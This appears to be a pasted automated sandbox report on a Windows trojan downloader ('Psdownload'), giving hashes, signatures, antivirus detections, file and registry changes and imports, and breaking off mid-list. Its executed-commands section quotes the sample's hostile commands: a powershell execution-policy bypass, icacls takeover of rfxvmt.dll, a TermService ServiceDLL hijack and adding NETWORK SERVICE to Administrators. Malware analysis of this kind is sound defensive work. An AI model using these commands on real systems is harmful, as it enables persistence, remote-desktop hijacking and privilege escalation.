Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Psdownload"
- [*] MalScore: 10.0
- [*] File Name: "Exes_d9c6a67478f115a18d4a1091ed69bec4.exe"
- [*] File Size: 2572376
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
- [*] SHA256: "f54c918db990d89caac14f8aecf465d56267300adce0abca8a5514f6e255c12d"
- [*] MD5: "d9c6a67478f115a18d4a1091ed69bec4"
- [*] SHA1: "72f325b29009cd6701202c26d7e6f71e5cf49770"
- [*] SHA512: "2cb244a8e1e97bba933b6c1993ecfa7a15a920d96f16a3a1549833536646287c8f2b7c5e03fe66ca4522161e63425ccd815ee7958fd54218c50574105a11dab0"
- [*] CRC32: "18CAE714"
- [*] SSDEEP: "49152:s02xUWRNg4aIWzh74MUArNbY/jCBBdsPgFYogBQFV+5Cn8INchQkxQKry:cxFRKTjzdUkUSsVGcIWhhry"
- [*] Process Execution: [
- "Exes_d9c6a67478f115a18d4a1091ed69bec4.exe",
- "cmd.exe",
- "wscript.exe",
- "cmd.exe",
- "powershell.exe",
- "takeown.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "reg.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "svchost.exe",
- "taskhost.exe",
- "lsm.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2476"
- }
- ]
- },
- {
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details": [
- {
- "Window": "WSH-Timer"
- }
- ]
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "powershell.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x00000000, length: 0x00272c7f"
- },
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x0001901c, length: 0x0014bab3"
- },
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x00272c7f, length: 0x00000004"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x00000000, length: 0x00000040"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x000000f8, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x00000200, length: 0x7fe00000028"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f200, length: 0x00000020"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f258, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f3a8, length: 0x7fe00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f670, length: 0x00000010"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f840, length: 0x00000012"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x7fe00000228, length: 0x7fe00000078"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "wscript.exe -> cmd"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Attempts to restart the guest VM",
- "Details": []
- },
- {
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details": [
- {
- "Process": "svchost.exe (104)"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 7117002 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- },
- {
- "data": "%SystemRoot%\\help\\servicedll.dll"
- }
- ]
- },
- {
- "Description": "Attempts to execute a powershell command with suspicious parameter/s",
- "Details": [
- {
- "execution_policy": "Attempts to bypass execution policy"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP"
- }
- ]
- },
- {
- "Description": "File has been identified by 29 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "Bkav": "HW32.Packed."
- },
- {
- "CAT-QuickHeal": "Trojandownloader.Psdownload"
- },
- {
- "McAfee": "Artemis!D9C6A67478F1"
- },
- {
- "Alibaba": "TrojanDownloader:Win32/PsDownload.98174c72"
- },
- {
- "Arcabit": "Trojan.Barys.DF047"
- },
- {
- "Symantec": "W97M.Downloader"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "HEUR:Trojan-Downloader.Win32.PsDownload.gen"
- },
- {
- "BitDefender": "Gen:Variant.Ursu.481402"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.PsDownload.frcxyy"
- },
- {
- "AegisLab": "Trojan.Win32.PsDownload.4!c"
- },
- {
- "Avast": "Win32:Malware-gen"
- },
- {
- "Sophos": "Mal/Generic-S"
- },
- {
- "F-Secure": "Trojan.TR/Dldr.PsDownload.twazw"
- },
- {
- "DrWeb": "BackDoor.HRDP.12"
- },
- {
- "Emsisoft": "Gen:Variant.Ursu.481402 (B)"
- },
- {
- "Cyren": "W32/Trojan.KODO-0437"
- },
- {
- "Avira": "TR/Dldr.PsDownload.twazw"
- },
- {
- "Microsoft": "Trojan:Win32/Tiggre!rfn"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Psdownload.2572376"
- },
- {
- "ZoneAlarm": "HEUR:Trojan-Downloader.Win32.PsDownload.gen"
- },
- {
- "GData": "Gen:Variant.Barys.61511"
- },
- {
- "VBA32": "TrojanDownloader.PsDownload"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "ESET-NOD32": "a variant of Generik.HHGEYXI"
- },
- {
- "TrendMicro-HouseCall": "TROJ_GEN.R002H0CF919"
- },
- {
- "AVG": "Win32:Malware-gen"
- },
- {
- "Cybereason": "malicious.478f11"
- },
- {
- "Qihoo-360": "Win32/Trojan.ddb"
- }
- ]
- }
- ]
- [*] Started Service: [
- "TermService"
- ]
- [*] Executed Commands: [
- "\"cmd.exe\" /c wscript C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "wscript C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "\"C:\\Windows\\System32\\cmd.exe\" /c rename C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt runnable.ps1& powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "cmd /c rename C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt runnable.ps1& powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
- "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\servicedll.dll /f",
- "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService"
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_PerfMon_WrapMutex",
- "Global\\CLR_CASOFF_MUTEX"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_4043.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\install_776644.log",
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_986225.log",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\readme_88755.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changelog_66663.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\terminal.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\P76M9IKTLS2SWNQ7412A.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP",
- "C:\\Windows\\Help\\servicedll.dll",
- "C:\\Windows\\Help\\lababa.bin",
- "C:\\Windows\\Help\\portable.dat",
- "C:\\Windows\\sysnative\\rfxvmt.dll",
- "C:\\Windows\\Temp\\desk.txt",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsdAE7.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changelog_66663.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_4043.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\readme_88755.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\terminal.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d9c6a67478f115a18d4a1091ed69bec4.exe",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.988.16337562",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.988.16337562",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.988.16337562"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- ]
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetTempPathA",
- "address": "0x407070"
- },
- {
- "name": "GetFileSize",
- "address": "0x407074"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x407078"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40707c"
- },
- {
- "name": "CopyFileA",
- "address": "0x407080"
- },
- {
- "name": "ExitProcess",
- "address": "0x407084"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x407088"
- },
- {
- "name": "Sleep",
- "address": "0x40708c"
- },
- {
- "name": "GetTickCount",
- "address": "0x407090"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x407094"
- },
- {
- "name": "lstrlenA",
- "address": "0x407098"
- },
- {
- "name": "GetVersion",
- "address": "0x40709c"
- },
- {
- "name": "SetErrorMode",
- "address": "0x4070a0"
- },
- {
- "name": "lstrcpynA",
- "address": "0x4070a4"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x4070a8"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x4070ac"
- },
- {
- "name": "GetWindowsDirectoryA",
- "address": "0x4070b0"
- },
- {
- "name": "SetCurrentDirectoryA",
- "address": "0x4070b4"
- },
- {
- "name": "GetLastError",
- "address": "0x4070b8"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x4070bc"
- },
- {
- "name": "CreateProcessA",
- "address": "0x4070c0"
- },
- {
- "name": "RemoveDirectoryA",
- "address": "0x4070c4"
- },
- {
- "name": "CreateFileA",
- "address": "0x4070c8"
- },
- {
- "name": "GetTempFileNameA",
- "address": "0x4070cc"
- },
- {
- "name": "ReadFile",
- "address": "0x4070d0"
- },
- {
- "name": "WriteFile",
- "address": "0x4070d4"
- },
- {
- "name": "lstrcpyA",
- "address": "0x4070d8"
- },
- {
- "name": "MoveFileExA",
- "address": "0x4070dc"
- },
- {
- "name": "lstrcatA",
- "address": "0x4070e0"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x4070e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4070e8"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4070ec"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4070f0"
- },
- {
- "name": "CompareFileTime",
- "address": "0x4070f4"
- },
- {
- "name": "SetFileAttributesA",
- "address": "0x4070f8"
- },
- {
- "name": "GetFileAttributesA",
- "address": "0x4070fc"
- },
- {
- "name": "GetShortPathNameA",
- "address": "0x407100"
- },
- {
- "name": "MoveFileA",
- "address": "0x407104"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x407108"
- },
- {
- "name": "SetFileTime",
- "address": "0x40710c"
- },
- {
- "name": "SearchPathA",
- "address": "0x407110"
- },
- {
- "name": "CloseHandle",
- "address": "0x407114"
- },
- {
- "name": "lstrcmpiA",
- "address": "0x407118"
- },
- {
- "name": "CreateThread",
- "address": "0x40711c"
- },
- {
- "name": "GlobalLock",
- "address": "0x407120"
- },
- {
- "name": "lstrcmpA",
- "address": "0x407124"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x407128"
- },
- {
- "name": "FindNextFileA",
- "address": "0x40712c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x407130"
- },
- {
- "name": "SetFilePointer",
- "address": "0x407134"
- },
- {
- "name": "GetPrivateProfileStringA",
- "address": "0x407138"
- },
- {
- "name": "FindClose",
- "address": "0x40713c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x407140"
- },
- {
- "name": "FreeLibrary",
- "address": "0x407144"
- },
- {
- "name": "MulDiv",
- "address": "0x407148"
- },
- {
- "name": "WritePrivateProfileStringA",
- "address": "0x40714c"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x407150"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x407154"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x407158"
- },
- {
- "name": "GlobalFree",
- "address": "0x40715c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x407160"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ScreenToClient",
- "address": "0x407184"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x407188"
- },
- {
- "name": "SetClassLongA",
- "address": "0x40718c"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x407190"
- },
- {
- "name": "SetWindowPos",
- "address": "0x407194"
- },
- {
- "name": "GetSysColor",
- "address": "0x407198"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x40719c"
- },
- {
- "name": "SetCursor",
- "address": "0x4071a0"
- },
- {
- "name": "LoadCursorA",
- "address": "0x4071a4"
- },
- {
- "name": "CheckDlgButton",
- "address": "0x4071a8"
- },
- {
- "name": "GetMessagePos",
- "address": "0x4071ac"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x4071b0"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x4071b4"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x4071b8"
- },
- {
- "name": "CloseClipboard",
- "address": "0x4071bc"
- },
- {
- "name": "SetClipboardData",
- "address": "0x4071c0"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x4071c4"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x4071c8"
- },
- {
- "name": "GetWindowRect",
- "address": "0x4071cc"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x4071d0"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x4071d4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x4071d8"
- },
- {
- "name": "SetDlgItemTextA",
- "address": "0x4071dc"
- },
- {
- "name": "GetDlgItemTextA",
- "address": "0x4071e0"
- },
- {
- "name": "MessageBoxIndirectA",
- "address": "0x4071e4"
- },
- {
- "name": "CharPrevA",
- "address": "0x4071e8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x4071ec"
- },
- {
- "name": "PeekMessageA",
- "address": "0x4071f0"
- },
- {
- "name": "ReleaseDC",
- "address": "0x4071f4"
- },
- {
- "name": "EnableWindow",
- "address": "0x4071f8"
- },
- {
- "name": "InvalidateRect",
- "address": "0x4071fc"
- },
- {
- "name": "SendMessageA",
- "address": "0x407200"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x407204"
- },
- {
- "name": "BeginPaint",
- "address": "0x407208"
- },
- {
- "name": "GetClientRect",
- "address": "0x40720c"
- },
- {
- "name": "FillRect",
- "address": "0x407210"
- },
- {
- "name": "DrawTextA",
- "address": "0x407214"
- },
- {
- "name": "EndDialog",
- "address": "0x407218"
- },
- {
- "name": "RegisterClassA",
- "address": "0x40721c"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x407220"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x407224"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x407228"
- },
- {
- "name": "DialogBoxParamA",
- "address": "0x40722c"
- },
- {
- "name": "CharNextA",
- "address": "0x407230"
- },
- {
- "name": "ExitWindowsEx",
- "address": "0x407234"
- },
- {
- "name": "GetDC",
- "address": "0x407238"
- },
- {
- "name": "CreateDialogParamA",
- "address": "0x40723c"
- },
- {
- "name": "SetTimer",
- "address": "0x407240"
- },
- {
- "name": "GetDlgItem",
- "address": "0x407244"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x407248"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x40724c"
- },
- {
- "name": "LoadImageA",
- "address": "0x407250"
- },
- {
- "name": "IsWindow",
- "address": "0x407254"
- },
- {
- "name": "SendMessageTimeoutA",
- "address": "0x407258"
- },
- {
- "name": "FindWindowExA",
- "address": "0x40725c"
- },
- {
- "name": "OpenClipboard",
- "address": "0x407260"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x407264"
- },
- {
- "name": "AppendMenuA",
- "address": "0x407268"
- },
- {
- "name": "EndPaint",
- "address": "0x40726c"
- },
- {
- "name": "DestroyWindow",
- "address": "0x407270"
- },
- {
- "name": "wsprintfA",
- "address": "0x407274"
- },
- {
- "name": "ShowWindow",
- "address": "0x407278"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x40727c"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x40704c"
- },
- {
- "name": "SetBkMode",
- "address": "0x407050"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x407054"
- },
- {
- "name": "SetTextColor",
- "address": "0x407058"
- },
- {
- "name": "DeleteObject",
- "address": "0x40705c"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x407060"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x407064"
- },
- {
- "name": "SetBkColor",
- "address": "0x407068"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "SHGetSpecialFolderLocation",
- "address": "0x407168"
- },
- {
- "name": "ShellExecuteExA",
- "address": "0x40716c"
- },
- {
- "name": "SHGetPathFromIDListA",
- "address": "0x407170"
- },
- {
- "name": "SHBrowseForFolderA",
- "address": "0x407174"
- },
- {
- "name": "SHGetFileInfoA",
- "address": "0x407178"
- },
- {
- "name": "SHFileOperationA",
- "address": "0x40717c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "AdjustTokenPrivileges",
- "address": "0x407000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x407004"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x407008"
- },
